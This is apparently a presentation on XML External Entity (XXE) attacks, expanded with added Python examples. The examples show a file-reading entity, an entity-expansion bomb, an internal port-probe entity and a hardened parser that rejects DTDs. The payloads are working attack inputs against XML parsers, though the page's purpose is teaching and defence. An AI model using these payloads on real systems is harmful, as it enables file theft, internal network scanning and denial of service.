XML External Entities [XXE] Slipping in through the XML backdoor


XML is boring, but

What is it?

• The XML 1.0 specification allows a DTD to contain “entity declarations”: a name bound either to a literal value written inline (an internal entity) or to a resource named by a SYSTEM/PUBLIC identifier (an external entity)

• This allows XML documents to be more dynamic: the parser substitutes the entity’s content wherever the document references it

• Here are a couple of examples
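The example declarations on the slide itself are images that did not survive into this text. What follows is an added example (not code from the original deck) showing the two kinds of entity declaration and what a parser does with them: an internal entity expands to its literal value, and an external SYSTEM entity makes the parser read the file it names. It uses Python’s standard-library xml.sax parser; the order document, the temporary secret file and its contents are constructed for the demo.

```python
"""Entity declarations in practice: an internal entity expands to a literal,
an external (SYSTEM) entity makes the parser read a file.

Added example for this page; it is not code from the original slides.
Uses only the Python standard library (xml.sax on top of expat).
The document and the "secret" file are constructed here for the demo.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Records the text content of each element, keyed by tag name."""

    def __init__(self):
        super().__init__()
        self.text = {}
        self._stack = []

    def startElement(self, name, attrs):
        self._stack.append(name)
        self.text.setdefault(name, "")

    def endElement(self, name):
        self._stack.pop()

    def characters(self, content):
        # expat may deliver one text node in several chunks; append them all.
        if self._stack:
            self.text[self._stack[-1]] += content


def parse_text(xml_bytes: bytes, resolve_external: bool) -> dict:
    """Parse with xml.sax; resolve_external toggles external general entities.

    Python 3.7.1 and later ship this feature switched off; earlier releases
    fetched external entities unconditionally.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def build_document(secret_path: str) -> bytes:
    """Constructed document: one internal entity and one external entity."""
    return f"""<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY vendor "Example Corp">
  <!ENTITY leak SYSTEM "{secret_path}">
]>
<order><vendor>&vendor;</vendor><note>&leak;</note></order>
""".encode()


def demo() -> tuple:
    """Return (internal entity, external entity with feature off, with it on)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as f:
            f.write("db_password=hunter2")  # constructed sample secret
        doc = build_document(secret_path)
        default = parse_text(doc, resolve_external=False)
        enabled = parse_text(doc, resolve_external=True)
    return default["vendor"], default["note"], enabled["note"]


if __name__ == "__main__":
    vendor, note_off, note_on = demo()
    print("internal entity  :", vendor)          # Example Corp
    print("external, default:", repr(note_off))  # '' (reference silently dropped)
    print("external, enabled:", note_on)         # db_password=hunter2
```

With the feature off, the `&leak;` reference is dropped without error, which is why blind testing is needed to tell a hardened parser from a broken payload; with it on, the file contents land in the parsed document exactly as if the client had typed them.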

Who is affected?

• Lots of apps use XML

• Lots of formats rely on XML (SVG, RSS/Atom, Office documents)

• Lots of configuration files for apps use XML

• Lots of protocols rely on XML (SOAP, SAML, XMPP)

• Some use it without even knowing it (a library or framework parses it for them)

Who cares?

• Attackers and defenders should care because…

• …this is also a valid XXE declaration:

• …aaaaaand so is this!

What can you exploit?

• Denial of service (nested entity expansion that eats memory and CPU)

• File enumeration (whether a path exists shows in the error message or the timing)

• Network enumeration (the server fetches SYSTEM URIs on your behalf)

• Port scanning (same trick with the port varied; open versus closed shows in the error or the delay)

• Directory listing (Java’s file:// handler, for one, returns a listing for a directory URI)

• File exfiltration (a file is read into the document and comes back in the response, or is sent out-of-band)

…sometimes WITHOUT AUTH (the document is parsed before any credentials are checked)
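As an added example (not from the deck), two of the effects above in runnable form, driving Python’s expat binding directly: a nested-entity document of a few hundred bytes that expands to tens of thousands of characters (the denial-of-service case), and a SYSTEM entity aimed at an internal host and port (the network-reach case). The second part records the URL the parser wants to fetch instead of fetching it, so the block runs offline; the host 10.0.0.5:8080 and both documents are made up for the demo.

```python
"""What an attacker gets from a parser that honours entity declarations:
amplification (denial of service) and outbound requests (network reach).

Added example, not from the original slides. Python standard library only,
driving expat directly; every document here is constructed for the demo.
"""
import xml.parsers.expat as expat


def amplification_payload(levels: int = 4, fanout: int = 10) -> bytes:
    """Nested internal entities: each level references the previous one
    `fanout` times, so the expanded text grows by fanout ** levels."""
    decls = ['<!ENTITY e0 "lol">']
    for i in range(1, levels + 1):
        refs = f"&e{i - 1};" * fanout
        decls.append(f'<!ENTITY e{i} "{refs}">')
    dtd = "\n".join(decls)
    return f"<!DOCTYPE bomb [\n{dtd}\n]>\n<bomb>&e{levels};</bomb>".encode()


def expanded_size(xml_bytes: bytes) -> int:
    """Parse and count the characters the parser hands to the application;
    the ratio to len(xml_bytes) is the amplification factor."""
    count = 0

    def on_chars(data):
        nonlocal count
        count += len(data)

    parser = expat.ParserCreate()
    parser.CharacterDataHandler = on_chars
    parser.Parse(xml_bytes, True)
    return count


def outbound_targets(xml_bytes: bytes) -> list:
    """Record the URLs the parser asks for when resolving external entities.

    The handler logs the request instead of making it, so this runs offline.
    A parser with external entities enabled would really connect, and the
    response time or the error text tells the attacker whether the host and
    port answered.
    """
    targets = []

    def on_external_ref(context, base, system_id, public_id):
        targets.append(system_id)
        return 1  # report success with empty content so parsing continues

    parser = expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)
    return targets


# Constructed probe: a SYSTEM entity pointed at a made-up internal host:port.
PROBE = (
    b"<!DOCTYPE probe [\n"
    b'  <!ENTITY scan SYSTEM "http://10.0.0.5:8080/admin">\n'
    b"]>\n"
    b"<probe>&scan;</probe>"
)

if __name__ == "__main__":
    bomb = amplification_payload()
    print(len(bomb), "bytes in ->", expanded_size(bomb), "characters out")
    print("parser would fetch:", outbound_targets(PROBE))
```

The default payload is 280 bytes and expands to 30,000 characters; add one level or raise the fan-out and the numbers climb geometrically, which is the whole point. Recent expat builds cap the amplification once output passes a size threshold, but only if the parser in front of you is that expat, which is exactly the “are your libraries up to date” question from the later slides.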

Let’s see it…

How do you stop it?

• Coders that know about XXE don’t reflect the parsed XML back to the client

• But that didn’t work well:

  • Because of error messages (a parse error that quotes the entity’s content leaks the file anyway)

  • Because of response timing differences (fetching an open port or a large file takes measurably longer)

  • Because of Timur Yunusov & Alexey Osipov’s Out-of-Band XXE attack (the parser is made to send the data to an attacker-controlled host, so the response is never needed)

How do you stop it? Take two

• A lot of parser libraries added an option to disable external entities

• But that didn’t work well

  • Because many coders don’t realize this is an attack vector, so they never flip the switch

How do you stop it? Take three

• A lot of parser libraries now disable external entities by default

• Actually works pretty well…

  • …provided your libraries are up to date

  • …and no developer re-enabled it (turning it back on is usually one line)
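An added example (not from the deck) of the “take three” posture in Python’s standard library: a parser for untrusted input that refuses any DOCTYPE, which removes entity declarations of every kind, plus a check of the default you are relying on (xml.sax has shipped with feature_external_ges off since Python 3.7.1). The sample documents, including the file path in the attack, are constructed for the demo.

```python
"""Hardened parsing of untrusted XML: refuse any DTD, and check the
library default you are relying on.

Added example for this page, not code from the slides. Python standard
library only; the sample documents are constructed inline.
"""
import xml.parsers.expat as expat
import xml.sax
from xml.sax.handler import feature_external_ges


class DTDForbidden(ValueError):
    """Raised when untrusted input carries a <!DOCTYPE ...> declaration."""


def parse_untrusted(xml_bytes: bytes) -> dict:
    """Parse untrusted XML into {tag: text}, rejecting any DOCTYPE.

    With no DTD there are no entity declarations at all, so neither external
    entities (file reads, outbound requests) nor nested internal entities
    (amplification) can be declared. Unlike "don't reflect the XML back",
    this leaves no error, timing or out-of-band channel to exploit.
    """
    text = {}
    stack = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside an expat handler aborts the parse; the exception
        # propagates out of parser.Parse().
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in untrusted XML")

    def on_start(name, attrs):
        stack.append(name)
        text.setdefault(name, "")

    def on_end(name):
        stack.pop()

    def on_chars(data):
        if stack:
            text[stack[-1]] += data

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    parser.Parse(xml_bytes, True)
    return text


def sax_resolves_external_entities() -> bool:
    """What a fresh xml.sax parser does with external general entities.

    False on Python 3.7.1 and later (off by default); older releases fetched
    them without asking. The one line that undoes the safe default is
    parser.setFeature(feature_external_ges, True), which has no business
    near untrusted input.
    """
    return bool(xml.sax.make_parser().getFeature(feature_external_ges))


# Constructed inputs: a benign document and an XXE attempt.
BENIGN = b"<order><vendor>Example Corp</vendor></order>"
ATTACK = (
    b'<!DOCTYPE order [<!ENTITY leak SYSTEM "file:///etc/hostname">]>'
    b"<order><vendor>&leak;</vendor></order>"
)


def demo() -> tuple:
    """Return (benign parse result, whether the attack was rejected)."""
    benign = parse_untrusted(BENIGN)
    try:
        parse_untrusted(ATTACK)
        rejected = False
    except DTDForbidden:
        rejected = True
    return benign, rejected


if __name__ == "__main__":
    print(demo())                               # ({'order': '', 'vendor': 'Example Corp'}, True)
    print(sax_resolves_external_entities())     # False on Python 3.7.1+
```

Rejecting the DOCTYPE outright is the defence to standardise on: it does not depend on which of a library’s several entity-related switches you remembered, and it makes the attack visible in your logs instead of silently dropping the reference.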

Summary

• XML is all over the place

• XXE is really bad

• If defending, make sure you are not vulnerable: test your own parsers rather than trusting that the defaults are safe

• If attacking, make sure you test for XXE, cause it’s really SWEET if you find it

Shout-outs

• Lots of smart people have researched and talked about this

• Timur Yunusov & Alexey Osipov - OOB XXE talk at Black Hat 2013

• Timothy D. Morgan - What You Didn't Know About XML External Entities Attacks

• Alex Lauerman @ TrustFoundry